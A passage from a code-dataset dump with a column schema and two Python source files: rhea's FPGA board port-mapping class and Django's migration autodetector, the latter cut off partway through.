repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
cfelton/rhea | rhea/build/fpga.py | 1 | 8511 | #
# Copyright (c) 2014-2015 Christopher Felton
#
import os
import shutil
import inspect
from random import randint
from copy import copy
import myhdl
from myhdl._block import _Block as Block
from .extintf import Port
from .extintf import Clock
from .extintf import Reset
class FPGA(object):
""" """
vendor = "" # FPGA vendor, Altera, Xilinx, Lattice
device = "" # FPGA device type
family = "" # FPGA family
_name = None
# relate ports to the hardware pins
default_clocks = {}
default_resets = {}
default_ports = {}
default_extintf = {}
def __init__(self):
# default attributes
self.top = None # top-level myhdl module
self.top_params = None # top-level parameters
self.top_name = self._name # resulting name, project name etc.
self._clocks = {}
self._resets = {}
self._ports = {}
self._extintfs = {}
# walk through the default settings
for k, v in self.default_clocks.items():
self.add_clock(k, **v)
for k, v in self.default_resets.items():
self.add_reset(k, **v)
for k, v in self.default_ports.items():
self.add_port(k, **v)
for k, v in self.default_extintf.items():
self.add_extintf(k, v)
@property
def ports(self):
return self._ports
def get_port(self, port_name):
port = None
if port_name in self._ports:
port = self._ports[port_name]
return port
def has_top(self):
""" a top-level is set """
return self.top is not None
def set_top(self, top, **params):
self.top = top
self.top_params = params
if self.top_name is None:
self.top_name = top.func_name
def get_flow(self):
raise NotImplementedError
def _remove_embed_attr(self, pins, pattr):
""" removed an embedded pin attribute def if present.
"""
for v in pins:
if isinstance(v, dict):
pattr = v
pins.remove(v)
break
return pattr
def add_clock(self, name, frequency=1, pins=None, **pattr):
if isinstance(pins, (list,tuple)):
pins = pins[0]
assert isinstance(pins, (str,int)), "pins type %s" % (type(pins))
p = Port(name, pins, sigtype=Clock(0, frequency=frequency), **pattr)
self._clocks[name] = p
self._ports[name] = p
def add_reset(self, name, active, isasync, pins, **pattr):
assert isinstance(isasync, bool)
assert active in (0,1,)
p = Port(name, pins,
sigtype=Reset(0, active=active, isasync=isasync), **pattr)
# add to the reset and port dicts
self._resets[name] = p
self._ports[name] = p
def add_port(self, name, pins, **pattr):
""" add a port definition
A port definition maps a port (an HDL top-level signal name)
to a pin on the physical device including any attributes of
the pin / signal.
Example:
brd.add_port("gpio", pins=(23,24,25,26,), pullup=True)
It is acceptable to have ports with the same names.
"""
if isinstance(pins, (str, int)):
pins = [pins,]
assert isinstance(pins, (list,tuple)), \
"pins must be a list/tuple of pins (or a single str/int)"
pins = list(pins)
pattr = self._remove_embed_attr(pins, pattr)
# make sure the pin list is a number or string
for v in pins:
assert isinstance(v, (str, int))
# @todo: raise an error vs.
assert name not in self._ports, \
"{} already exists in {}".format(name, self._name)
self._ports[name] = Port(name, pins, **pattr)
def add_port_name(self, name, port, slc=None, **pattr):
""" add a new name, *name*, to an existing port, *port*.
This function is used when the default port name is known
but not the pins (if the pins are known use add_port).
A port name is linked to a default port name or a subset
(slice) is linked to the new name.
Example:
brd.add_port_name('led', 'wingC', 7)
where wingC is a 16-bit port bit-vector
To extract a range from the port, the slice class has to
be used, example:
brd.link_port_name('MSB', 'wingC', slice(16,8))
"""
p = self._ports[port]
if slc is None:
pins = p.pins
else:
if isinstance(slc, (slice, int)):
pins = p.pins[slc]
elif isinstance(slc, (list, tuple)):
pins = []
for i in slc:
if isinstance(i, int):
pins.append(p.pins[i])
else:
pins += list(p.pins[i])
else:
raise Exception("slc must be an int, a slice, or a list of these")
kws = p.pattr.copy()
kws.update(pattr)
self.add_port(name, pins, **kws)
def rename_port(self, port, name, slc=None, **pattr):
""" rename a *port* to a new *name*
This function is useful for *bootstrapping*, bootstrapping
uses the port names that exist in the object and doesn't
have a method to select from multiple definitions. Also,
useful when the top-level HDL has conflicts.
"""
pass
def add_extintf(self, name, extintf):
"""
"""
self._extintfs[name] = extintf
# @todo: extract all the ports from the extintf and
# add them to the global port dict
pass
def get_portmap(self, top=None, **kwargs):
""" given a top-level map the port definitions
This module will map the top-level MyHDL module ports
to a board definition.
Example usage:
brd = rhea.build..get_board(<board name>)
portmap = brd.get_portmatp(top=m_myhdl_module)
myhdl.toVerilog(m_myhdl_module, **portmap)
"""
if top is not None:
self.set_top(top)
# get the top-level ports and parameters
assert self.top is not None
pp = inspect.getargspec(self.top.func)
# all of the arguments (no default values) are treated as
# ports. This doesn't mean it needs to be a port but it
# is convention that ports are the arguments and parameters
# are keyword arguments. A parameter can exist in this
# list but it can't be empty ...
# @todo: this needs some more thought, keyword args might
# be ports, need a method to determine.
hdlports = {}
if pp.defaults is not None:
pl = len(pp.args)-len(pp.defaults)
else:
pl = len(pp.args)
for pn in pp.args[:pl]:
hdlports[pn] = None
params = {}
for ii, kw in enumerate(pp.args[pl:]):
params[kw] = pp.defaults[ii]
# see if any of the ports or parameters have been overridden
if self.top_params is not None:
for k, v in self.top_params.items():
if k in hdlports:
hdlports[k] = v
for k, v in self.top_params.items():
if k in params:
params[k] = v
for k, v in kwargs.items():
if k in hdlports:
hdlports[k] = v
for k, v in kwargs.items():
if k in params:
params[k] = v
# @todo: log this information, some parameters can be too large
# to be useful dumping to screen (print).
# log.write("HDL PORTS %s" % (hdlports,))
# log.write("HDL PARAMS %s" % (params,))
# match the fpga ports to the hdl ports, not if a port is
# a keyword argument in the top-level this will fail
# @todo: this matching code needs to be enhanced, this should
# always match a top-level port to a port def.
for port_name,port in self._ports.items():
if port_name in hdlports:
hdlports[port_name] = port.sig
port.inuse = True
for k, v in hdlports.items():
assert v is not None, "Error unspecified port %s"%(k)
# combine the ports and params
pp = hdlports.copy()
pp.update(params)
return pp
| mit | -7,065,893,078,664,873,000 | 32.116732 | 82 | 0.546587 | false |
h4r5h1t/django-hauthy | django/db/migrations/autodetector.py | 87 | 54478 | from __future__ import unicode_literals
import datetime
import re
from itertools import chain
from django.conf import settings
from django.db import models
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.operations.models import AlterModelOptions
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.questioner import MigrationQuestioner
from django.utils import six
from .topological_sort import stable_topological_sort
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
self.from_state = from_state
self.to_state = to_state
self.questioner = questioner or MigrationQuestioner()
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
"""
Main entry point to produce a list of appliable changes.
Takes a graph to base names on and an optional set of apps
to try and restrict to (restriction is not guaranteed)
"""
changes = self._detect_changes(convert_apps, graph)
changes = self.arrange_for_graph(changes, graph, migration_name)
if trim_to_apps:
changes = self._trim_to_apps(changes, trim_to_apps)
return changes
def deep_deconstruct(self, obj):
"""
Recursive deconstruction for a field and its arguments.
Used for full comparison for rename/alter; sometimes a single-level
deconstruction will not compare correctly.
"""
if not hasattr(obj, 'deconstruct') or isinstance(obj, type):
return obj
deconstructed = obj.deconstruct()
if isinstance(obj, models.Field):
# we have a field which also returns a name
deconstructed = deconstructed[1:]
path, args, kwargs = deconstructed
return (
path,
[self.deep_deconstruct(value) for value in args],
{
key: self.deep_deconstruct(value)
for key, value in kwargs.items()
},
)
def only_relation_agnostic_fields(self, fields):
"""
Return a definition of the fields that ignores field names and
what related fields actually relate to.
Used for detecting renames (as, of course, the related fields
change during renames)
"""
fields_def = []
for name, field in fields:
deconstruction = self.deep_deconstruct(field)
if field.rel and field.rel.to:
del deconstruction[2]['to']
fields_def.append(deconstruction)
return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
"""
Returns a dict of migration plans which will achieve the
change from from_state to to_state. The dict has app labels
as keys and a list of migrations as values.
The resulting migrations aren't specially named, but the names
do matter for dependencies inside the set.
convert_apps is the list of apps to convert to use migrations
(i.e. to make initial migrations for, in the usual case)
graph is an optional argument that, if provided, can help improve
dependency generation and avoid potential circular dependencies.
"""
# The first phase is generating all the operations for each app
# and gathering them into a big per-app list.
# We'll then go through that list later and order it and split
# into migrations to resolve dependencies caused by M2Ms and FKs.
self.generated_operations = {}
# Prepare some old/new state and model lists, separating
# proxy models and ignoring unmigrated apps.
self.old_apps = self.from_state.concrete_apps
self.new_apps = self.to_state.apps
self.old_model_keys = []
self.old_proxy_keys = []
self.old_unmanaged_keys = []
self.new_model_keys = []
self.new_proxy_keys = []
self.new_unmanaged_keys = []
for al, mn in sorted(self.from_state.models.keys()):
model = self.old_apps.get_model(al, mn)
if not model._meta.managed:
self.old_unmanaged_keys.append((al, mn))
elif al not in self.from_state.real_apps:
if model._meta.proxy:
self.old_proxy_keys.append((al, mn))
else:
self.old_model_keys.append((al, mn))
for al, mn in sorted(self.to_state.models.keys()):
model = self.new_apps.get_model(al, mn)
if not model._meta.managed:
self.new_unmanaged_keys.append((al, mn))
elif (
al not in self.from_state.real_apps or
(convert_apps and al in convert_apps)
):
if model._meta.proxy:
self.new_proxy_keys.append((al, mn))
else:
self.new_model_keys.append((al, mn))
# Renames have to come first
self.generate_renamed_models()
# Prepare field lists, and prepare a list of the fields that used
# through models in the old state so we can make dependencies
# from the through model deletion to the field that uses it.
self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
self.through_users = {}
self.old_field_keys = set()
self.new_field_keys = set()
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
# Through model map generation
for app_label, model_name in sorted(self.old_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
for field_name, field in old_model_state.fields:
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(field_name)
if (hasattr(old_field, "rel") and getattr(old_field.rel, "through", None)
and not old_field.rel.through._meta.auto_created):
through_key = (
old_field.rel.through._meta.app_label,
old_field.rel.through._meta.model_name,
)
self.through_users[through_key] = (app_label, old_model_name, field_name)
# Generate non-rename model operations
self.generate_deleted_models()
self.generate_created_models()
self.generate_deleted_proxies()
self.generate_created_proxies()
self.generate_altered_options()
self.generate_altered_managers()
# Generate field operations
self.generate_renamed_fields()
self.generate_removed_fields()
self.generate_added_fields()
self.generate_altered_fields()
self.generate_altered_unique_together()
self.generate_altered_index_together()
self.generate_altered_db_table()
self.generate_altered_order_with_respect_to()
# Now, reordering to make things possible. The order we have already
# isn't bad, but we need to pull a few things around so FKs work nicely
# inside the same app
for app_label, ops in sorted(self.generated_operations.items()):
# construct a dependency graph for intra-app dependencies
dependency_graph = {op: set() for op in ops}
for op in ops:
for dep in op._auto_deps:
if dep[0] == app_label:
for op2 in ops:
if self.check_dependency(op2, dep):
dependency_graph[op].add(op2)
# we use a stable sort for deterministic tests & general behavior
self.generated_operations[app_label] = stable_topological_sort(ops, dependency_graph)
# Now, we need to chop the lists of operations up into migrations with
# dependencies on each other.
# We do this by stepping up an app's list of operations until we
# find one that has an outgoing dependency that isn't in another app's
# migration yet (hasn't been chopped off its list). We then chop off the
# operations before it into a migration and move onto the next app.
# If we loop back around without doing anything, there's a circular
# dependency (which _should_ be impossible as the operations are all
# split at this point so they can't depend and be depended on)
self.migrations = {}
num_ops = sum(len(x) for x in self.generated_operations.values())
chop_mode = False
while num_ops:
# On every iteration, we step through all the apps and see if there
# is a completed set of operations.
# If we find that a subset of the operations are complete we can
# try to chop it off from the rest and continue, but we only
# do this if we've already been through the list once before
# without any chopping and nothing has changed.
for app_label in sorted(self.generated_operations.keys()):
chopped = []
dependencies = set()
for operation in list(self.generated_operations[app_label]):
deps_satisfied = True
operation_dependencies = set()
for dep in operation._auto_deps:
is_swappable_dep = False
if dep[0] == "__setting__":
# We need to temporarily resolve the swappable dependency to prevent
# circular references. While keeping the dependency checks on the
# resolved model we still add the swappable dependencies.
# See #23322
resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
original_dep = dep
dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
is_swappable_dep = True
if dep[0] != app_label and dep[0] != "__setting__":
# External app dependency. See if it's not yet
# satisfied.
for other_operation in self.generated_operations.get(dep[0], []):
if self.check_dependency(other_operation, dep):
deps_satisfied = False
break
if not deps_satisfied:
break
else:
if is_swappable_dep:
operation_dependencies.add((original_dep[0], original_dep[1]))
elif dep[0] in self.migrations:
operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
else:
# If we can't find the other app, we add a first/last dependency,
# but only if we've already been through once and checked everything
if chop_mode:
# If the app already exists, we add a dependency on the last migration,
# as we don't know which migration contains the target field.
# If it's not yet migrated or has no migrations, we use __first__
if graph and graph.leaf_nodes(dep[0]):
operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
else:
operation_dependencies.add((dep[0], "__first__"))
else:
deps_satisfied = False
if deps_satisfied:
chopped.append(operation)
dependencies.update(operation_dependencies)
self.generated_operations[app_label] = self.generated_operations[app_label][1:]
else:
break
# Make a migration! Well, only if there's stuff to put in it
if dependencies or chopped:
if not self.generated_operations[app_label] or chop_mode:
subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
instance.dependencies = list(dependencies)
instance.operations = chopped
self.migrations.setdefault(app_label, []).append(instance)
chop_mode = False
else:
self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
new_num_ops = sum(len(x) for x in self.generated_operations.values())
if new_num_ops == num_ops:
if not chop_mode:
chop_mode = True
else:
raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
num_ops = new_num_ops
# OK, add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
return self.migrations
def check_dependency(self, operation, dependency):
"""
Returns ``True`` if the given operation depends on the given dependency,
``False`` otherwise.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower() and
any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name_lower == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name_lower == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Field is removed and part of an index/unique_together
elif dependency[2] is not None and dependency[3] == "foo_together_change":
return (
isinstance(operation, (operations.AlterUniqueTogether,
operations.AlterIndexTogether)) and
operation.name_lower == dependency[1].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
def generate_renamed_models(self):
"""
Finds any renamed models, and generates the operations for them,
and removes the old entry from the model lists.
Must be run before other model-level generation.
"""
self.renamed_models = {}
self.renamed_models_rel = {}
added_models = set(self.new_model_keys) - set(self.old_model_keys)
for app_label, model_name in sorted(added_models):
model_state = self.to_state.models[app_label, model_name]
model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
removed_models = set(self.old_model_keys) - set(self.new_model_keys)
for rem_app_label, rem_model_name in removed_models:
if rem_app_label == app_label:
rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
if model_fields_def == rem_model_fields_def:
if self.questioner.ask_rename_model(rem_model_state, model_state):
self.add_operation(
app_label,
operations.RenameModel(
old_name=rem_model_state.name,
new_name=model_state.name,
)
)
self.renamed_models[app_label, model_name] = rem_model_name
self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
self.old_model_keys.remove((rem_app_label, rem_model_name))
self.old_model_keys.append((app_label, model_name))
break
def generate_created_models(self):
"""
Find all new models (both managed and unmanaged) and make create
operations for them as well as separate operations to create any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also defer any model options that refer to collections of fields
that might be deferred (e.g. unique_together, index_together).
"""
old_keys = set(self.old_model_keys).union(self.old_unmanaged_keys)
added_models = set(self.new_model_keys) - old_keys
added_unmanaged_models = set(self.new_unmanaged_keys) - old_keys
all_added_models = chain(
sorted(added_models, key=self.swappable_first_key, reverse=True),
sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
)
for app_label, model_name in all_added_models:
model_state = self.to_state.models[app_label, model_name]
model_opts = self.new_apps.get_model(app_label, model_name)._meta
# Gather related fields
related_fields = {}
primary_key_rel = None
for field in model_opts.local_fields:
if field.rel:
if field.rel.to:
if field.primary_key:
primary_key_rel = field.rel.to
elif not field.rel.parent_link:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model_opts.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Are there unique/index_together to defer?
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
# Depend on the deletion of any possible proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Depend on the other end of the primary key if it's a relation
if primary_key_rel:
dependencies.append((
primary_key_rel._meta.app_label,
primary_key_rel._meta.object_name,
None,
True
))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[d for d in model_state.fields if d[0] not in related_fields],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
dependencies=dependencies,
beginning=True,
)
# Don't add operations which modify the database for unmanaged models
if not model_opts.managed:
continue
# Generate operations for each related field
for name, field in sorted(related_fields.items()):
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True
))
# Depend on our own model being created
dependencies.append((app_label, model_name, None, True))
# Make operation
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=name,
field=field,
),
dependencies=list(set(dependencies)),
)
# Generate other opns
related_dependencies = [
(app_label, model_name, name, True)
for name, field in sorted(related_fields.items())
]
related_dependencies.append((app_label, model_name, None, True))
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=unique_together,
),
dependencies=related_dependencies
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=index_together,
),
dependencies=related_dependencies
)
if order_with_respect_to:
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=order_with_respect_to,
),
dependencies=[
(app_label, model_name, order_with_respect_to, True),
(app_label, model_name, None, True),
]
)
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
We use the same statements as that way there's less code duplication,
but of course for proxy models we can skip all that pointless field
stuff and just chuck out an operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
def generate_deleted_models(self):
"""
Find all deleted models (managed and unmanaged) and make delete
operations for them as well as separate operations to delete any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also bring forward removal of any model options that refer to
collections of fields - the inverse of generate_created_models().
"""
new_keys = set(self.new_model_keys).union(self.new_unmanaged_keys)
deleted_models = set(self.old_model_keys) - new_keys
deleted_unmanaged_models = set(self.old_unmanaged_keys) - new_keys
all_deleted_models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
for app_label, model_name in all_deleted_models:
model_state = self.from_state.models[app_label, model_name]
model = self.old_apps.get_model(app_label, model_name)
if not model._meta.managed:
# Skip here, no need to handle fields for unmanaged models
continue
# Gather related fields
related_fields = {}
for field in model._meta.local_fields:
if field.rel:
if field.rel.to:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
for field in model._meta.local_many_to_many:
if field.rel.to:
related_fields[field.name] = field
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
related_fields[field.name] = field
# Generate option removal first
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=None,
)
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=None,
)
)
# Then remove each related field
for name, field in sorted(related_fields.items()):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=name,
)
)
# Finally, remove the model.
# This depends on both the removal/alteration of all incoming fields
# and the removal of all its own related fields, and if it's
# a through model the field that references it.
dependencies = []
for related_object in model._meta.related_objects:
related_object_app_label = related_object.related_model._meta.app_label
object_name = related_object.related_model._meta.object_name
field_name = related_object.field.name
dependencies.append((related_object_app_label, object_name, field_name, False))
if not related_object.many_to_many:
dependencies.append((related_object_app_label, object_name, field_name, "alter"))
for name, field in sorted(related_fields.items()):
dependencies.append((app_label, model_name, name, False))
# We're referenced in another field's through=
through_user = self.through_users.get((app_label, model_state.name_lower), None)
if through_user:
dependencies.append((through_user[0], through_user[1], through_user[2], False))
# Finally, make the operation, deduping any dependencies
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
dependencies=list(set(dependencies)),
)
def generate_deleted_proxies(self):
"""
Makes DeleteModel statements for proxy models.
"""
deleted = set(self.old_proxy_keys) - set(self.new_proxy_keys)
for app_label, model_name in sorted(deleted):
model_state = self.from_state.models[app_label, model_name]
assert model_state.options.get("proxy", False)
self.add_operation(
app_label,
operations.DeleteModel(
name=model_state.name,
),
)
def generate_renamed_fields(self):
"""
Works out renamed fields
"""
self.renamed_fields = {}
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Scan to see if this is actually a rename!
field_dec = self.deep_deconstruct(field)
for rem_app_label, rem_model_name, rem_field_name in sorted(self.old_field_keys - self.new_field_keys):
if rem_app_label == app_label and rem_model_name == model_name:
old_field_dec = self.deep_deconstruct(old_model_state.get_field_by_name(rem_field_name))
if field.rel and field.rel.to and 'to' in old_field_dec[2]:
old_rel_to = old_field_dec[2]['to']
if old_rel_to in self.renamed_models_rel:
old_field_dec[2]['to'] = self.renamed_models_rel[old_rel_to]
if old_field_dec == field_dec:
if self.questioner.ask_rename(model_name, rem_field_name, field_name, field):
self.add_operation(
app_label,
operations.RenameField(
model_name=model_name,
old_name=rem_field_name,
new_name=field_name,
)
)
self.old_field_keys.remove((rem_app_label, rem_model_name, rem_field_name))
self.old_field_keys.add((app_label, model_name, field_name))
self.renamed_fields[app_label, model_name, field_name] = rem_field_name
break
def generate_added_fields(self):
"""
Fields that have been added
"""
for app_label, model_name, field_name in sorted(self.new_field_keys - self.old_field_keys):
self._generate_added_field(app_label, model_name, field_name)
def _generate_added_field(self, app_label, model_name, field_name):
field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Fields that are foreignkeys/m2ms depend on stuff
dependencies = []
if field.rel and field.rel.to:
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.rel.to._meta.app_label
dep_object_name = field.rel.to._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.rel, "through", None) and not field.rel.through._meta.auto_created:
dependencies.append((
field.rel.through._meta.app_label,
field.rel.through._meta.object_name,
None,
True,
))
# You can't just add NOT NULL fields with no default or fields
# which don't allow empty strings as default.
preserve_default = True
if (not field.null and not field.has_default() and
not isinstance(field, models.ManyToManyField) and
not (field.blank and field.empty_strings_allowed)):
field = field.clone()
field.default = self.questioner.ask_not_null_addition(field_name, model_name)
preserve_default = False
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
),
dependencies=dependencies,
)
def generate_removed_fields(self):
"""
Fields that have been removed.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys - self.new_field_keys):
self._generate_removed_field(app_label, model_name, field_name)
def _generate_removed_field(self, app_label, model_name, field_name):
self.add_operation(
app_label,
operations.RemoveField(
model_name=model_name,
name=field_name,
),
# We might need to depend on the removal of an
# order_with_respect_to or index/unique_together operation;
# this is safely ignored if there isn't one
dependencies=[
(app_label, model_name, field_name, "order_wrt_unset"),
(app_label, model_name, field_name, "foo_together_change"),
],
)
def generate_altered_fields(self):
"""
Fields that have been altered.
"""
for app_label, model_name, field_name in sorted(self.old_field_keys.intersection(self.new_field_keys)):
# Did the field change?
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_field_name = self.renamed_fields.get((app_label, model_name, field_name), field_name)
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(old_field_name)
new_field = self.new_apps.get_model(app_label, model_name)._meta.get_field(field_name)
# Implement any model renames on relations; these are handled by RenameModel
# so we need to exclude them from the comparison
if hasattr(new_field, "rel") and getattr(new_field.rel, "to", None):
rename_key = (
new_field.rel.to._meta.app_label,
new_field.rel.to._meta.model_name,
)
if rename_key in self.renamed_models:
new_field.rel.to = old_field.rel.to
old_field_dec = self.deep_deconstruct(old_field)
new_field_dec = self.deep_deconstruct(new_field)
if old_field_dec != new_field_dec:
both_m2m = (
isinstance(old_field, models.ManyToManyField) and
isinstance(new_field, models.ManyToManyField)
)
neither_m2m = (
not isinstance(old_field, models.ManyToManyField) and
not isinstance(new_field, models.ManyToManyField)
)
if both_m2m or neither_m2m:
# Either both fields are m2m or neither is
preserve_default = True
if (old_field.null and not new_field.null and not new_field.has_default() and
not isinstance(new_field, models.ManyToManyField)):
field = new_field.clone()
new_default = self.questioner.ask_not_null_alteration(field_name, model_name)
if new_default is not models.NOT_PROVIDED:
field.default = new_default
preserve_default = False
else:
field = new_field
self.add_operation(
app_label,
operations.AlterField(
model_name=model_name,
name=field_name,
field=field,
preserve_default=preserve_default,
)
)
else:
# We cannot alter between m2m and concrete fields
self._generate_removed_field(app_label, model_name, field_name)
self._generate_added_field(app_label, model_name, field_name)
